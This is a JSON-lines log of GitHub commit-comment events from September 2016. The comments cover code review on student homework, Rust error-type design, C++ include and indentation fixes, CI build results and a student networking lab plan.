{"id":"4577001160","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"amy-b/homework-city"},"payload":{"comment":{"id":19062037,"position":12,"line":12,"path":"Assignment 6/starter_code/js/index.js","commit_id":"3d68ca25793bf943a403cb9e347c54ab07115565","created_at":"2016-09-17T00:23:57Z","updated_at":"2016-09-17T00:23:57Z","body":"Great use of .change() ...you could also detect when the \"select\" changes, instead of the \"form\", and then `$(this).val()` will get you the selected item...not essential for the requirements, but good to be aware of! 👍 "}},"created_at":"2016-09-17T00:23:57Z"}
{"id":"4577002428","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"amy-b/homework-city"},"payload":{"comment":{"id":19062041,"position":19,"line":19,"path":"Assignment 6/starter_code/js/index.js","commit_id":"3d68ca25793bf943a403cb9e347c54ab07115565","created_at":"2016-09-17T00:24:35Z","updated_at":"2016-09-17T00:24:35Z","body":"Looks like this line, `$(\"form\").trigger(\"reset\");` is causing an issue when you select \"ATX\", the rest looks great though!"}},"created_at":"2016-09-17T00:24:35Z"}
{"id":"4577004693","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"nabijaczleweli/termimage"},"payload":{"comment":{"id":19062045,"position":13,"line":13,"path":"src/error.rs","commit_id":"991a55513867335836ee479cf2a7bc3f36ad8676","created_at":"2016-09-17T00:25:33Z","updated_at":"2016-09-17T00:25:33Z","body":">could write the formatted string there \r\n\r\nNo.\r\n\r\n>I'd just format the String in both variants upfront in a constructor\r\n\r\nAlso no."}},"created_at":"2016-09-17T00:25:33Z"}
{"id":"4577005460","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"nabijaczleweli/termimage"},"payload":{"comment":{"id":19062047,"position":13,"line":13,"path":"src/error.rs","commit_id":"991a55513867335836ee479cf2a7bc3f36ad8676","created_at":"2016-09-17T00:25:58Z","updated_at":"2016-09-17T00:25:58Z","body":"Status: rejected.\r\nCause: too much of a breaking change and impl burden for little to no benefit."}},"created_at":"2016-09-17T00:25:58Z"}
{"id":"4577011824","type":"CommitCommentEvent","actor":{"login":"malosopt"},"repo":{"name":"malosopt/1098763"},"payload":{"comment":{"id":19062066,"position":2,"line":2,"path":"README.md","commit_id":"10a4439ff2288138b6795d2e399c35b4747486c6","created_at":"2016-09-17T00:29:07Z","updated_at":"2016-09-17T00:29:07Z","body":"sin comentarios"}},"created_at":"2016-09-17T00:29:07Z"}
{"id":"4577013893","type":"CommitCommentEvent","actor":{"login":"co5mo"},"repo":{"name":"kodi-czsk/plugin.video.sosac.ph"},"payload":{"comment":{"id":19062072,"position":null,"line":null,"path":null,"commit_id":"224d227be7a3710ae683012389e3f3cb5cb3ed1a","created_at":"2016-09-17T00:30:07Z","updated_at":"2016-09-17T00:30:07Z","body":"@ExSport islo by prosim vypnut tvorenie adresarov pri add all movies je to zbytocne a library update trva dlhsie dakujem"}},"created_at":"2016-09-17T00:30:07Z"}
{"id":"4577015600","type":"CommitCommentEvent","actor":{"login":"dpc"},"repo":{"name":"nabijaczleweli/termimage"},"payload":{"comment":{"id":19062078,"position":13,"line":13,"path":"src/error.rs","commit_id":"991a55513867335836ee479cf2a7bc3f36ad8676","created_at":"2016-09-17T00:30:53Z","updated_at":"2016-09-17T00:30:53Z","body":"The benefit is that people would be able to use that `Error` in generics eg.\r\n\r\n`impl<E : std::error::Error>` etc.\r\n\r\nwhich would make it like all the other errors, which is pretty common. (see eg. https://users.rust-lang.org/t/announcing-error-chain-a-library-for-consistent-and-reliable-rust-error-handling/6133 ). Error interoperability is very important for the ecosystem.\r\n\r\nJust an advice though, not a big deal."}},"created_at":"2016-09-17T00:30:53Z"}
{"id":"4577015764","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"ovanegas6/homework-city"},"payload":{"comment":{"id":19062079,"position":37,"line":4,"path":"js/index.js","commit_id":"21651fbc4f11666371599534b6b97edf94fe077d","created_at":"2016-09-17T00:30:58Z","updated_at":"2016-09-17T00:30:58Z","body":"Great work with the array and loop!"}},"created_at":"2016-09-17T00:30:58Z"}
{"id":"4577016553","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"ovanegas6/homework-city"},"payload":{"comment":{"id":19062083,"position":41,"line":8,"path":"js/index.js","commit_id":"21651fbc4f11666371599534b6b97edf94fe077d","created_at":"2016-09-17T00:31:24Z","updated_at":"2016-09-17T00:31:24Z","body":"Nice work including the element in the value attribute as well as between the `<option>` tags! 👍 "}},"created_at":"2016-09-17T00:31:24Z"}
{"id":"4577017378","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"ovanegas6/homework-city"},"payload":{"comment":{"id":19062087,"position":50,"line":17,"path":"js/index.js","commit_id":"21651fbc4f11666371599534b6b97edf94fe077d","created_at":"2016-09-17T00:31:46Z","updated_at":"2016-09-17T00:31:46Z","body":"Great to see you setting a variable and using `$(this)`"}},"created_at":"2016-09-17T00:31:46Z"}
{"id":"4577017466","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19062088,"position":null,"line":null,"path":null,"commit_id":"15fc86f4d703412e9b177c6af382ea207ea0d5de","created_at":"2016-09-17T00:31:49Z","updated_at":"2016-09-17T00:31:49Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2305 of 2472 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-15fc86f4d703412e9b177c6af382ea207ea0d5de-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-15fc86f4d703412e9b177c6af382ea207ea0d5de-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.24%25-yellow.svg)</a> \n"}},"created_at":"2016-09-17T00:31:49Z"}
{"id":"4577017747","type":"CommitCommentEvent","actor":{"login":"julienledem"},"repo":{"name":"pcmoritz/arrow"},"payload":{"comment":{"id":19062089,"position":null,"line":null,"path":null,"commit_id":"0707062979e99e136656bf7ebfda7f4eb722b5ce","created_at":"2016-09-17T00:31:57Z","updated_at":"2016-09-17T00:31:57Z","body":"@pcmoritz I think you should submit a PR. Just mention at the top if you consider this a prototype and not production ready code to manage reviewers expectations.\r\n\r\nSee:\r\nhttps://issues.apache.org/jira/browse/ARROW-257\r\n\r\nCC/ @wesm @xhochy "}},"created_at":"2016-09-17T00:31:57Z"}
{"id":"4577021248","type":"CommitCommentEvent","actor":{"login":"tyler-sassaman"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19062097,"position":null,"line":null,"path":null,"commit_id":"7f5b3dc1ba8a89d303ffa5a927903a77492af920","created_at":"2016-09-17T00:33:43Z","updated_at":"2016-09-17T00:33:43Z","body":"From reading the question prompt I believe that the fire messages are going to in the form of command line arguments that pass: ip address, port, x coor, y coor -- an example:\r\n    python client.py 128.111.52.245 5000 5 7, where the client is accessing the server 128.111.52.245 on port 5000 with x = 5 and y = 7. If we can save the information to variables then pass them in the message and IP address with ports?"}},"created_at":"2016-09-17T00:33:43Z"}
{"id":"4577022288","type":"CommitCommentEvent","actor":{"login":"pavel-paulau"},"repo":{"name":"couchbaselabs/showfast"},"payload":{"comment":{"id":19062098,"position":9,"line":8,"path":"Makefile","commit_id":"ea418d78e255bc385d449b4eebbaee9fe00a33f4","created_at":"2016-09-17T00:34:14Z","updated_at":"2016-09-17T00:34:14Z","body":"Please re-add ```--ldflags \"-s\" && upx -q6 showfast```."}},"created_at":"2016-09-17T00:34:14Z"}
{"id":"4577022499","type":"CommitCommentEvent","actor":{"login":"Tomcc"},"repo":{"name":"Tomcc/dojo2D"},"payload":{"comment":{"id":19062100,"position":14,"line":256,"path":"src/World.cpp","commit_id":"356c2f652d8f1d7c6f117836cc09ae710ddae3c9","created_at":"2016-09-17T00:34:20Z","updated_at":"2016-09-17T00:34:20Z","body":"Ocio all'indentazione :P"}},"created_at":"2016-09-17T00:34:20Z"}
{"id":"4577023011","type":"CommitCommentEvent","actor":{"login":"ssteinerx"},"repo":{"name":"pydanny/cookiecutter-django"},"payload":{"comment":{"id":19062102,"position":null,"line":null,"path":null,"commit_id":"da42b3854d85b1df42c67e4e5f3d9131aacecd2c","created_at":"2016-09-17T00:34:36Z","updated_at":"2016-09-17T00:34:36Z","body":"django_coverage_plugin is also being removed in Django 1.10 release."}},"created_at":"2016-09-17T00:34:36Z"}
{"id":"4577023236","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"nabijaczleweli/termimage"},"payload":{"comment":{"id":19062104,"position":13,"line":13,"path":"src/error.rs","commit_id":"991a55513867335836ee479cf2a7bc3f36ad8676","created_at":"2016-09-17T00:34:43Z","updated_at":"2016-09-17T00:34:43Z","body":"This is not meant to behave like a standard Error, blame name change on /u/dpc_pw."}},"created_at":"2016-09-17T00:34:43Z"}
{"id":"4577023343","type":"CommitCommentEvent","actor":{"login":"pavel-paulau"},"repo":{"name":"couchbaselabs/showfast"},"payload":{"comment":{"id":19062105,"position":3,"line":2,"path":"Makefile","commit_id":"ea418d78e255bc385d449b4eebbaee9fe00a33f4","created_at":"2016-09-17T00:34:47Z","updated_at":"2016-09-17T00:34:47Z","body":"No need to add trailing spaces."}},"created_at":"2016-09-17T00:34:47Z"}
{"id":"4577023575","type":"CommitCommentEvent","actor":{"login":"Tomcc"},"repo":{"name":"Tomcc/dojo2D"},"payload":{"comment":{"id":19062107,"position":5,"line":71,"path":"include/Dojo2D/ParticleSystem.h","commit_id":"d4896cb9d72ef31788f48532a29e29f9b3ed2f23","created_at":"2016-09-17T00:34:53Z","updated_at":"2016-09-17T00:34:53Z","body":"Ocio all'indentazione pure qua sisi"}},"created_at":"2016-09-17T00:34:53Z"}
{"id":"4577023826","type":"CommitCommentEvent","actor":{"login":"Tomcc"},"repo":{"name":"Tomcc/dojo2D"},"payload":{"comment":{"id":19062109,"position":5,"line":23,"path":"include/Dojo2D/ParticleSystemRenderer.h","commit_id":"d4896cb9d72ef31788f48532a29e29f9b3ed2f23","created_at":"2016-09-17T00:35:02Z","updated_at":"2016-09-17T00:35:02Z","body":"Also l'indentazione"}},"created_at":"2016-09-17T00:35:02Z"}
{"id":"4577023963","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"ovanegas6/homework-city"},"payload":{"comment":{"id":19062110,"position":58,"line":25,"path":"js/index.js","commit_id":"21651fbc4f11666371599534b6b97edf94fe077d","created_at":"2016-09-17T00:35:05Z","updated_at":"2016-09-17T00:35:05Z","body":"We actually don't need to use event.preventDefault() when `<select>` menus change...I understand your logic here though!"}},"created_at":"2016-09-17T00:35:05Z"}
{"id":"4577025766","type":"CommitCommentEvent","actor":{"login":"Tomcc"},"repo":{"name":"Tomcc/dojo2D"},"payload":{"comment":{"id":19062113,"position":4,"line":4,"path":"include/Dojo2D/PhysUtil.h","commit_id":"d4896cb9d72ef31788f48532a29e29f9b3ed2f23","created_at":"2016-09-17T00:36:02Z","updated_at":"2016-09-17T00:36:02Z","body":"Hmm tutti sti include nuovi non mi piacciono, preferivo rimanessero in `\"common_header.h\"`. Sei sicuro non si puo' lasciarceli? Dovrebbe funzionare anche in quel modo!"}},"created_at":"2016-09-17T00:36:02Z"}
{"id":"4577027980","type":"CommitCommentEvent","actor":{"login":"Tomcc"},"repo":{"name":"Tomcc/dojo2D"},"payload":{"comment":{"id":19062118,"position":10,"line":5,"path":"src/RayResult.cpp","commit_id":"d4896cb9d72ef31788f48532a29e29f9b3ed2f23","created_at":"2016-09-17T00:37:09Z","updated_at":"2016-09-17T00:37:09Z","body":"Le `<` sono sbagliate perche' questo file (e pure gli altri con <>) sono in Dojo2D, mentre quello significa \"esterno\"... e settando i path correttamente non ti dovrebbe servire \"dojo2D/\" come prefisso!"}},"created_at":"2016-09-17T00:37:09Z"}
{"id":"4577029561","type":"CommitCommentEvent","actor":{"login":"Tomcc"},"repo":{"name":"Tomcc/dojo2D"},"payload":{"comment":{"id":19062122,"position":16,"line":8,"path":"src/World.cpp","commit_id":"d4896cb9d72ef31788f48532a29e29f9b3ed2f23","created_at":"2016-09-17T00:38:01Z","updated_at":"2016-09-17T00:38:01Z","body":"Stesso qua, IMO non serve cambiare queste linee, dovrebbe funzionare com'era prima settando CMake correttamente (dojo funziona)"}},"created_at":"2016-09-17T00:38:01Z"}
{"id":"4577030272","type":"CommitCommentEvent","actor":{"login":"GauthamRajesh"},"repo":{"name":"GauthamRajesh/frontend-nanodegree-feedreader"},"payload":{"comment":{"id":19062125,"position":null,"line":null,"path":null,"commit_id":"0df23175d7737a1d709e1672c6b84fbb92b92f56","created_at":"2016-09-17T00:38:25Z","updated_at":"2016-09-17T00:38:25Z","body":"nice"}},"created_at":"2016-09-17T00:38:25Z"}
{"id":"4577031441","type":"CommitCommentEvent","actor":{"login":"Tomcc"},"repo":{"name":"Tomcc/dojo2D"},"payload":{"comment":{"id":19062128,"position":62,"line":62,"path":"CMakeLists.txt","commit_id":"a5a31eb4b8966ae724bbbf54b73d6a2a1ee4d1be","created_at":"2016-09-17T00:39:01Z","updated_at":"2016-09-17T00:39:01Z","body":"Potrebbe averci senso estrarre una funzione che fa questa roba con pochi parametri in dojo, e poi riusarla qua... in finale questo fa quasi le stesse cose"}},"created_at":"2016-09-17T00:39:01Z"}
{"id":"4577032797","type":"CommitCommentEvent","actor":{"login":"Tomcc"},"repo":{"name":"Tomcc/dojo2D"},"payload":{"comment":{"id":19062136,"position":81,"line":81,"path":"src/PhysUtil.cpp","commit_id":"a5a31eb4b8966ae724bbbf54b73d6a2a1ee4d1be","created_at":"2016-09-17T00:39:44Z","updated_at":"2016-09-17T00:39:44Z","body":"I commit che spostano questi file vanno squashati cosi' git capisce che sono spostati e non nuovi!"}},"created_at":"2016-09-17T00:39:44Z"}
{"id":"4577034058","type":"CommitCommentEvent","actor":{"login":"Tomcc"},"repo":{"name":"Tomcc/dojo2D"},"payload":{"comment":{"id":19062139,"position":9,"line":11,"path":"include/Dojo2D/Body.h","commit_id":"1f629a982a4651bf55f642deba4c503923f77d46","created_at":"2016-09-17T00:40:24Z","updated_at":"2016-09-17T00:40:24Z","body":"Questi include pure non dovrebbero essere affatto necessari, mi sa che hai qualche problema per cui `\"common_header.h\"` non viene letto, dato che li include la'!"}},"created_at":"2016-09-17T00:40:24Z"}
{"id":"4577034634","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Stuff"},"payload":{"comment":{"id":19062142,"position":null,"line":null,"path":null,"commit_id":"95def2ed044c95151bcde583d0ead05331995974","created_at":"2016-09-17T00:40:43Z","updated_at":"2016-09-17T00:40:43Z","body":"@19smitgr\r\nHEY!"}},"created_at":"2016-09-17T00:40:43Z"}
{"id":"4577035922","type":"CommitCommentEvent","actor":{"login":"Tomcc"},"repo":{"name":"Tomcc/dojo2D"},"payload":{"comment":{"id":19062145,"position":101,"line":97,"path":"include/Dojo2D/Body.h","commit_id":"1f629a982a4651bf55f642deba4c503923f77d46","created_at":"2016-09-17T00:41:28Z","updated_at":"2016-09-17T00:41:28Z","body":"Tutti questi `Dojo::` aggiunti ovunque mi sembrano causati dal fatto che `\"common_header.h\"` non funziona, come la cosa appena sopra... in common_header importa `Vector` in Dojo2D quindi il namespace era gia' giusto!"}},"created_at":"2016-09-17T00:41:28Z"}
{"id":"4577036579","type":"CommitCommentEvent","actor":{"login":"Tomcc"},"repo":{"name":"Tomcc/dojo2D"},"payload":{"comment":{"id":19062149,"position":11,"line":6,"path":"src/ParticleSystem.cpp","commit_id":"1f629a982a4651bf55f642deba4c503923f77d46","created_at":"2016-09-17T00:41:52Z","updated_at":"2016-09-17T00:41:52Z","body":"Anche questi non dovrebbe servire cambiarli."}},"created_at":"2016-09-17T00:41:52Z"}
{"id":"4577037676","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Stuff"},"payload":{"comment":{"id":19062153,"position":null,"line":null,"path":null,"commit_id":"4b3cd546b6a7c650575b172ad7fd5cf1edee9bc0","created_at":"2016-09-17T00:42:31Z","updated_at":"2016-09-17T00:42:31Z","body":"SORRY ALEX! THIS IS MEANT FOR GARRETT!"}},"created_at":"2016-09-17T00:42:31Z"}
{"id":"4577040598","type":"CommitCommentEvent","actor":{"login":"Tomcc"},"repo":{"name":"Tomcc/dojo2D"},"payload":{"comment":{"id":19062163,"position":26,"line":75,"path":"include/Dojo2D/ParticleSystem.h","commit_id":"356c2f652d8f1d7c6f117836cc09ae710ddae3c9","created_at":"2016-09-17T00:44:12Z","updated_at":"2016-09-17T00:44:12Z","body":"Il codice commentato dovrebbe essere cancellato!"}},"created_at":"2016-09-17T00:44:12Z"}
{"id":"4577048589","type":"CommitCommentEvent","actor":{"login":"greatislander"},"repo":{"name":"BCcampus/pressbooks-textbook"},"payload":{"comment":{"id":19062182,"position":62,"line":406,"path":"pressbooks-textbook.php","commit_id":"df98d54f9185bc30de3b86c709cf8ee1511b4071","created_at":"2016-09-17T00:48:47Z","updated_at":"2016-09-17T00:48:47Z","body":"Actually—I'm using your option still! Sorry for the confusion. This particular change should be reverted."}},"created_at":"2016-09-17T00:48:47Z"}
{"id":"4577048817","type":"CommitCommentEvent","actor":{"login":"dpc"},"repo":{"name":"nabijaczleweli/termimage"},"payload":{"comment":{"id":19062183,"position":13,"line":13,"path":"src/error.rs","commit_id":"991a55513867335836ee479cf2a7bc3f36ad8676","created_at":"2016-09-17T00:48:54Z","updated_at":"2016-09-17T00:48:54Z","body":"/u/dpc_pw is me! :laughing: \r\n\r\n`Outpu` was clearly a `Result` and `Error` here is clearly an error type and would be best if implemented `std::error::Error`. Ask someone else for opinion. :)\r\n\r\nAnyway, no hard feelings. Just sharing my opionion."}},"created_at":"2016-09-17T00:48:54Z"}
{"id":"4577049381","type":"CommitCommentEvent","actor":{"login":"Yongyao"},"repo":{"name":"mudrod/mudrod"},"payload":{"comment":{"id":19062184,"position":33,"line":45,"path":"core/src/main/java/esiptestbed/mudrod/ssearch/ranking/Learner.java","commit_id":"1a9aa7506252a0275c9b837379ef7ccd6a614873","created_at":"2016-09-17T00:49:14Z","updated_at":"2016-09-17T00:49:14Z","body":"The reason why I added this line of code is that there is a bug when running spark on windows."}},"created_at":"2016-09-17T00:49:14Z"}
{"id":"4577050291","type":"CommitCommentEvent","actor":{"login":"Yongyao"},"repo":{"name":"mudrod/mudrod"},"payload":{"comment":{"id":19062185,"position":40,"line":43,"path":"core/src/main/java/esiptestbed/mudrod/ssearch/ranking/Learner.java","commit_id":"1a9aa7506252a0275c9b837379ef7ccd6a614873","created_at":"2016-09-17T00:49:46Z","updated_at":"2016-09-17T00:49:46Z","body":"It still does not work. Please see https://github.com/mudrod/mudrod/issues/60"}},"created_at":"2016-09-17T00:49:46Z"}
{"id":"4577050804","type":"CommitCommentEvent","actor":{"login":"greatislander"},"repo":{"name":"BCcampus/pressbooks-textbook"},"payload":{"comment":{"id":19062186,"position":9,"line":49,"path":"themes-book/opentextbook/functions.php","commit_id":"df98d54f9185bc30de3b86c709cf8ee1511b4071","created_at":"2016-09-17T00:50:05Z","updated_at":"2016-09-17T00:50:05Z","body":"Again—sorry for the confusion! I decided to retain your option since the Privacy settings page used separate options for each item (as opposed to a group saved as an array in a single option key). I'll submit a PR to fix."}},"created_at":"2016-09-17T00:50:05Z"}
{"id":"4577060165","type":"CommitCommentEvent","actor":{"login":"greatislander"},"repo":{"name":"BCcampus/pressbooks-textbook"},"payload":{"comment":{"id":19062201,"position":9,"line":49,"path":"themes-book/opentextbook/functions.php","commit_id":"df98d54f9185bc30de3b86c709cf8ee1511b4071","created_at":"2016-09-17T00:55:31Z","updated_at":"2016-09-17T00:55:31Z","body":"(Nevermind! I see you already have. Cheers. Friday evening brain.)"}},"created_at":"2016-09-17T00:55:31Z"}
{"id":"4577060918","type":"CommitCommentEvent","actor":{"login":"bdolor"},"repo":{"name":"BCcampus/pressbooks-textbook"},"payload":{"comment":{"id":19062204,"position":9,"line":49,"path":"themes-book/opentextbook/functions.php","commit_id":"df98d54f9185bc30de3b86c709cf8ee1511b4071","created_at":"2016-09-17T00:55:58Z","updated_at":"2016-09-17T00:55:58Z","body":"This is covered in https://github.com/BCcampus/pressbooks-textbook/commit/787aa4f217665c0bb40b77f26e5474cdabe8d67f"}},"created_at":"2016-09-17T00:55:58Z"}
{"id":"4577061123","type":"CommitCommentEvent","actor":{"login":"xxdamage"},"repo":{"name":"xxdamage/xxdamagebot"},"payload":{"comment":{"id":19062206,"position":null,"line":null,"path":null,"commit_id":"e34e7f97737ffa044f05761791e188f35a89c655","created_at":"2016-09-17T00:56:07Z","updated_at":"2016-09-17T00:56:07Z","body":"añadido fortune.lua"}},"created_at":"2016-09-17T00:56:07Z"}
{"id":"4577061826","type":"CommitCommentEvent","actor":{"login":"bdolor"},"repo":{"name":"BCcampus/pressbooks-textbook"},"payload":{"comment":{"id":19062210,"position":62,"line":406,"path":"pressbooks-textbook.php","commit_id":"df98d54f9185bc30de3b86c709cf8ee1511b4071","created_at":"2016-09-17T00:56:33Z","updated_at":"2016-09-17T00:56:33Z","body":"This is covered in https://github.com/BCcampus/pressbooks-textbook/commit/787aa4f217665c0bb40b77f26e5474cdabe8d67f"}},"created_at":"2016-09-17T00:56:33Z"}
{"id":"4577063394","type":"CommitCommentEvent","actor":{"login":"greatislander"},"repo":{"name":"BCcampus/pressbooks-textbook"},"payload":{"comment":{"id":19062217,"position":9,"line":49,"path":"themes-book/opentextbook/functions.php","commit_id":"df98d54f9185bc30de3b86c709cf8ee1511b4071","created_at":"2016-09-17T00:57:30Z","updated_at":"2016-09-17T00:57:30Z","body":"Thanks Brad! Clear indicator that I should be calling it a day 👍 "}},"created_at":"2016-09-17T00:57:30Z"}
{"id":"4577064158","type":"CommitCommentEvent","actor":{"login":"pasin"},"repo":{"name":"couchbase/couchbase-lite-java-core"},"payload":{"comment":{"id":19062219,"position":5,"line":1449,"path":"src/main/java/com/couchbase/lite/store/SQLiteStore.java","commit_id":"611d61b2806d20a62f0f728a5f53b671be323830","created_at":"2016-09-17T00:57:57Z","updated_at":"2016-09-17T00:57:57Z","body":"I think set it to false is more correct. In general the `out` value returned shouldn't be affected by the initial value."}},"created_at":"2016-09-17T00:57:57Z"}
{"id":"4577064554","type":"CommitCommentEvent","actor":{"login":"pasin"},"repo":{"name":"couchbase/couchbase-lite-java-core"},"payload":{"comment":{"id":19062220,"position":5,"line":1449,"path":"src/main/java/com/couchbase/lite/store/SQLiteStore.java","commit_id":"611d61b2806d20a62f0f728a5f53b671be323830","created_at":"2016-09-17T00:58:11Z","updated_at":"2016-09-17T00:58:11Z","body":"Probably the root cause is https://github.com/couchbase/couchbase-lite-java-core/issues/1428."}},"created_at":"2016-09-17T00:58:11Z"}
{"id":"4577065253","type":"CommitCommentEvent","actor":{"login":"KeksKlip"},"repo":{"name":"KeksKlip/AwesomeTTS"},"payload":{"comment":{"id":19062223,"position":null,"line":null,"path":null,"commit_id":"d2d9f9c194f3741c823709022f1861fb4260bca0","created_at":"2016-09-17T00:58:37Z","updated_at":"2016-09-17T00:58:37Z","body":"oxforddictionaries.com have changed the DOM. This commit fixes searching for audio files."}},"created_at":"2016-09-17T00:58:37Z"}
{"id":"4577068252","type":"CommitCommentEvent","actor":{"login":"jeffreychingchan"},"repo":{"name":"Devbootcamp/phase-0-tracks"},"payload":{"comment":{"id":19062230,"position":null,"line":null,"path":null,"commit_id":"21a644a8b4b136bc9b1b90e4b4d0208e62edb202","created_at":"2016-09-17T01:00:21Z","updated_at":"2016-09-17T01:00:21Z","body":"@omgmakeme hello!"}},"created_at":"2016-09-17T01:00:21Z"}
{"id":"4577070785","type":"CommitCommentEvent","actor":{"login":"dssquared"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19062239,"position":null,"line":null,"path":null,"commit_id":"7f5b3dc1ba8a89d303ffa5a927903a77492af920","created_at":"2016-09-17T01:01:52Z","updated_at":"2016-09-17T01:01:52Z","body":"Yes, on the client side they will be passed as arguments to the program\neach time the client is invoked. So we will just save them to variables to\nbe used in the rest of the program. The server side will do the same thing\nwith the text file for the board but only invoked once. We will need\nmethods (on server side) to keep track of the board and to check the board\nand return hit, miss, and sunk \"data'. The 'data' could be a char or a bit,\nthis will be changed if needed to fit the http response. On the server side\nwe need to make methods to read the text file from the argument and\npopulate a new text file or 2d array, the methods keeping track of the\nboard will have to use work with the text files or 2d array. So whoever is\ndoing the board tracking methods needs to know if the other person is using\n2d arrays or text file. Reading in the text file argument and populating an\narray or other text file will be pretty quick, whoever does that, I think\nEmmanuel, can help elsewhere once that is done. The board tracking and http\nmessages will be more work.\nI will be posting more code this evening or early tomorrow morning.\nLet's all keep in touch as to stay on track and help with any questions.\n\nDavid\n\nOn Fri, Sep 16, 2016 at 6:33 PM, tyler-sassaman <notifications@github.com>\nwrote:\n\n> From reading the question prompt I believe that the fire messages are\n> going to in the form of command line arguments that pass: ip address, port,\n> x coor, y coor -- an example:\n> python client.py 128.111.52.245 5000 5 7, where the client is accessing\n> the server 128.111.52.245 on port 5000 with x = 5 and y = 7. If we can save\n> the information to variables then pass them in the message and IP address\n> with ports?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dssquared/Networks_Lab1/commit/7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19062097>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AE8DGwFsyA2c3CS-ksCKtoejFRP_-hH6ks5qqzVngaJpZM4J_dYG>\n> .\n>\n"}},"created_at":"2016-09-17T01:01:52Z"}
{"id":"4577075329","type":"CommitCommentEvent","actor":{"login":"MaxymVlasov"},"repo":{"name":"omi-team/VCSlab"},"payload":{"comment":{"id":19062246,"position":null,"line":null,"path":null,"commit_id":"2c6c40c7b2f1b65cdc0bbd015bbe6708afb78b0c","created_at":"2016-09-17T01:04:04Z","updated_at":"2016-09-17T01:04:04Z","body":"Woe, non-standard merge commit message)"}},"created_at":"2016-09-17T01:04:04Z"}
{"id":"4577076233","type":"CommitCommentEvent","actor":{"login":"Synapz1"},"repo":{"name":"Synapz1/Paintball"},"payload":{"comment":{"id":19062251,"position":4,"line":4,"path":"changelog.txt","commit_id":"c3fd2aed75f81c336430c34f7fb5375cd25eeb48","created_at":"2016-09-17T01:04:39Z","updated_at":"2016-09-17T01:04:39Z","body":"I can build it but it does not put the dependency in the jar. And no one told me what to do. They are just like google how to maven shade... like what? (Not you)\r\n\r\nI have to try what you said. I haven't had time but hopefully that works. Thanks for explaining it to me there :D"}},"created_at":"2016-09-17T01:04:39Z"}
{"id":"4577077464","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19062255,"position":null,"line":null,"path":null,"commit_id":"13627153888d3ac71645178a674491bc8151b8b6","created_at":"2016-09-17T01:05:27Z","updated_at":"2016-09-17T01:05:27Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1764 of 1765 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.9%25-green.svg)</a>\n"}},"created_at":"2016-09-17T01:05:27Z"}
{"id":"4577078989","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19062260,"position":null,"line":null,"path":null,"commit_id":"13627153888d3ac71645178a674491bc8151b8b6","created_at":"2016-09-17T01:06:18Z","updated_at":"2016-09-17T01:06:18Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-17T01:06:18Z"}
{"id":"4577084120","type":"CommitCommentEvent","actor":{"login":"kmiloarguello"},"repo":{"name":"kmiloarguello/testbext"},"payload":{"comment":{"id":19062271,"position":4,"line":11,"path":"index.html","commit_id":"7c467930d5c7d1761301c2c9ce8432bf73089f45","created_at":"2016-09-17T01:09:37Z","updated_at":"2016-09-17T01:09:37Z","body":"Hay que seguir teniendo esta tipografía"}},"created_at":"2016-09-17T01:09:37Z"}
